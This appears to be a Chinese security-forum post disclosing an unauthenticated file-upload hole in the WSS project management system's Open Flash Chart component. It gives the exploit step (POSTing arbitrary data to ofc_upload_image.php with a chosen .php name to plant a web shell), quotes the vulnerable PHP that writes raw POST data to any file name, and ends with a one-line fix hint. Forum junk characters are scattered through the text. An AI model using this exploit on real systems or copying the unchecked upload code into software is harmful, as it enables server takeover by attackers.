WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
8 d' q, S: g! w& t% e+ A
利用：
% a9 }& Y8 R" ^3 b! G5 o/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
% m4 ?& Y: ~- U" m4 ?0 |( _5 ^
! P: e4 d. Q* z3 q0 y. D) d$ _Post任意数据
* o( T" _9 a: {5 K0 F$ N保存位置http://localhost/chart/tmp-upload-images/hfy.php
. c6 M3 j& j# S$ V# ]( l

最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

) ~; l7 @2 G  {5 n3 y$ @- c<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//
7 T1 u+ o  X7 W9 [/ [4 x! X
/*
$ d+ ~& D" s7 E' P
print_r( $_GET );
1 R; u4 ?! A; M1 |* U! }print_r( $_POST );
print_r( $_FILES );

% k+ [5 v# T+ h- Xprint_r( $GLOBALS );
; h. U, y. o- E0 {print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

) `8 w, D- [* W3 b1 r3 H*/
// default path for the image to be stored //
) E/ _: ~. S' B$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$ w  Z$ j. r' ~$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
" [, W+ N3 k3 {0 [+ ~// print_r( $_POST );
) x' p& H, U6 d$ x5 {: [// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
* {5 d3 e3 @  c$ ^// POST data is usually string data, but we are passing a RAW .png
2 P) N2 C. P6 l6 X- G1 t0 `' X// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
- N- t& |) F9 Y& d6 y/ J) R' v//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

/ }" O1 u' h! x, R6 Z% \//
// LOOK:
//
+ c* |. V4 q* X7 C% K. C1 iexit();
1 h( p1 x5 }. I* {' s1 p//
// PHP5:
0 C' L( O" C. |! r//


1 c. E% B0 K& O  T: O// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

' J. C, ~# e* z; }+ D. q- cif (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
0 U* s0 M4 ~- \3 k$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
3 p' ?) m$ W* E% l- W9 S; z    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
! h. T, O, j( y4 I    echo "FILE UPLOAD FAILED";
}
* b4 v( H8 c2 k# Y

?>


9 H6 n7 M7 `% M' ^' l' K3 J* V

; I) U$ o& E# M4 c9 ^- J

; U6 e' K% ^# C3 t2 B2 c6 [1 z修复方案：
. v' c* ~% I- A, |7 k( b. \4 t这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞

" @* z3 s" x8 @( f  n; W
  k# e1 p: ~0 [
  m) @) t& J' k9 N
) \2 o7 r/ \2 ~8 p" U' d